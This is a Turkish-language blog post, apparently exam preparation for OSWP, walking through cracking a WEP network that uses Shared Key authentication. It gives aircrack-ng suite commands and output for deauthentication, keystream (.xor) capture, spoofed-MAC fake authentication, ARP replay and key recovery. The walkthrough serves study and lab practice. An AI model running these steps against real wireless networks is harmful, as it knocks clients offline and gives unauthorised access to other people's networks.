İçeriğe geç

Shared Key Nedir?

OSWP sınavına hazırlanırken hiç bilmeyenler için kaynak üretmeye çalışıyorum bazen konuları fazla hızlı anlatıyorum ya da anlatmıyorum çünkü eskimiş teknolojiler oluyor. Mesela shared key gibi... Vaktim vardı bir kaç günede sınava gireceğim yazayim dedim...

Open Authentication'u biliyoruz. Adının hakkını veriyor çünkü gerçekten hiç bir doğrulama mekanizması olmadan AP ile iletişime geçebilecek duruma geliyoruz. Buda bize WEP ve Open authentication ile konfigüre edilmiş bir network'te kolayca paket injection yapabilme fırsatı veriyor.
Shared Key, hikayenin tam da bu kısmında devreye girmektedir. Sizi AP ile konuşturmadan önce doğrulamaya çalışır. Size bir challange request gönderir sizde bu geen bu request'teki veriyi doğru key ile şifreleyip cevap dönersiniz. Eğer AP bunu doğrularsa sizinle konuşmaya başlar. Çok güzel görünüyor değil mi? Ama yine çok kolay bir şekilde bypass edebiliriz.

Shared Key ile konfigüre edilmiş bir ağda ilk başta fake authetication saldırısı yapmaya deneyelim. Aşağıdakine benzer bir çıktı alırız.

┌──(root💀kali)-[/home/kali/oswp/shared]
└─# airodump-ng wlan0 --bssid 7A:2B:C1:63:BD:64 -c 1 -w shared
10:59:10  Created capture file "shared-01.cap".
┌──(root💀kali)-[/home/kali/oswp/shared]
└─# aireplay-ng -1 0 -e Huawei_HG655d -a 7A:2B:C1:63:BD:64 -h 3a:bd:12:90:30:0d wlan0
11:00:45  Waiting for beacon frame (BSSID: 7A:2B:C1:63:BD:64) on channel 1

11:00:45  Sending Authentication Request (Open System) [ACK]
11:00:45  Switching to shared key authentication
^Cad 25 packets....

Şimdi bir Deauthetication saldırısı yapalım ve bu esnada airodump-ng ile dinleme işlemi gerçekleştirelim. Network içerisindeki bir client tekrar ağa bağlandığında ondan XOR dosyasını elde edeceğiz ve bu dosya aracılığı ile challenge reqeste response oluşturabileceğiz.

┌──(root💀kali)-[/home/kali/oswp/shared]
└─# aireplay-ng -0 10 -a 7A:2B:C1:63:BD:64 wlan0
11:04:38  Waiting for beacon frame (BSSID: 7A:2B:C1:63:BD:64) on channel 1
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
11:04:39  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]
11:04:39  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]
11:04:40  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]
11:04:40  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]
11:04:41  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]
11:04:41  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]
11:04:42  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]
11:04:43  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]
11:04:43  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]
11:04:44  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]

┌──(root💀kali)-[/home/kali/oswp/shared]
└─# ls
shared-01-7A-2B-C1-63-BD-64.xor  shared-01.csv         shared-01.kismet.netxml
shared-01.cap                    shared-01.kismet.csv  shared-01.log.csv

Yukarıda görüldüğü üzere .xor dosyası elde edildi. Şimdi bu dosya aracılığı ile fake authentication saldırısı yapalım.

┌──(root💀kali)-[/home/kali/oswp/shared]
└─# aireplay-ng -1 600 -e Huawei_HG655d  -y shared-01-7A-2B-C1-63-BD-64.xor -a 7A:2B:C1:63:BD:64 -h 3a:bd:12:90:30:0d wlan0
The interface MAC (96:B5:61:AD:E1:1A) doesn't match the specified MAC (-h).
    ifconfig wlan0 hw ether 3A:BD:12:90:30:0D
11:07:15  Waiting for beacon frame (BSSID: 7A:2B:C1:63:BD:64) on channel 1

11:07:15  Sending Authentication Request (Shared Key)

11:07:17  Sending Authentication Request (Shared Key) [ACK]
11:07:17  Authentication 1/2 successful
11:07:17  Sending encrypted challenge. [ACK]
11:07:17  Authentication 2/2 successful
11:07:17  Sending Association Request [ACK]
11:07:17  Association successful :-) (AID: 1)

...

Harika! Artık sırada ARP-REPLAY ve aircrak-ng var. Arp-replay yaparken kolaylık açısından birde deauthentication saldırısı gerçekleştirirsek daha hızlı bir şekilde arp paketi yakalayabiliriz.

┌──(root💀kali)-[/home/kali/oswp/shared]
└─# aireplay-ng -3 -b 7A:2B:C1:63:BD:64 -h 3a:bd:12:90:30:0d wlan0                                             130 ⨯
The interface MAC (96:B5:61:AD:E1:1A) doesn't match the specified MAC (-h).
    ifconfig wlan0 hw ether 3A:BD:12:90:30:0D
11:09:10  Waiting for beacon frame (BSSID: 7A:2B:C1:63:BD:64) on channel 1
Saving ARP requests in replay_arp-0512-110910.cap
You should also start airodump-ng to capture replies.
^Cad 114438 packets (got 37470 ARP requests and 21755 ACKs), sent 33309 packets...(499 pps)
┌──(root💀kali)-[/home/kali/oswp/shared]
└─# aireplay-ng -0 10 -a 7A:2B:C1:63:BD:64 wlan0 
11:09:13  Waiting for beacon frame (BSSID: 7A:2B:C1:63:BD:64) on channel 1
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
11:09:13  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]
11:09:14  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]
11:09:14  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]
11:09:15  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]
11:09:15  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]
11:09:16  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]
11:09:16  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]
11:09:17  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]
11:09:17  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]
11:09:18  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]

 CH  1 ][ Elapsed: 6 mins ][ 2021-05-12 11:11 ][ interface wlan0 down 

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 7A:2B:C1:63:BD:64  -38 100     3424    22693    0   1   54e. WEP  WEP    SKA  Huawei_HG655d                        

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 7A:2B:C1:63:BD:64  18:28:61:28:F8:70  -18   54e-54e     0    13447                                                  
 7A:2B:C1:63:BD:64  3A:BD:12:90:30:0D  -38    0 - 1      0    65725                                                  
Quitting...
┌──(root💀kali)-[/home/kali/oswp/shared]
└─# aircrack-ng shared-01.cap                                 
Reading packets, please wait...
Opening shared-01.cap
Read 188762 packets.
                                            Got 22697 out of 20000 IVsStarting PTW attack with 22697 ivs.
   #  BSSID              ESSID                     Encryption

   1  7A:2B:C1:63:BD:64  Huawei_HG655d             WEP (22697 IVs)

Choosing first network as target.

Reading packets, please wait...
Opening shared-01.cap
Read 188762 packets.

1 potential targets

Attack will be restarted every 5000 captured ivs.

                                                 Aircrack-ng 1.6 

                                   [00:00:01] Tested 71432 keys (got 22393 IVs)

   KB    depth   byte(vote)
    0    0/  1   00(36352) C8(28928) E3(27904) BA(27648) 0A(27392) B8(27392) 61(26880) 8D(26880) 
    1   14/ 16   D9(26368) 00(26112) 16(26112) 9F(26112) FC(26112) 30(25856) 48(25856) 79(25856) 
    2    0/  2   00(32768) FB(28416) 56(28160) 97(27904) B2(27904) F6(27904) 81(27648) 20(27392) 
    3    2/ 58   00(28160) D2(28160) CA(27904) 19(27904) 01(27648) 3A(27392) 4A(27392) 56(27392) 
    4    8/ 41   00(26880) 04(26624) 1E(26624) CF(26368) FA(26112) 69(26112) 85(26112) C8(26112) 

                     KEY FOUND! [ 00:00:00:00:00 ] (ASCII: ..... )
    Decrypted correctly: 100%

Ağın parolası:0000000000'muş...

Kategori:Wireless

İlk Yorumu Siz Yapın

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir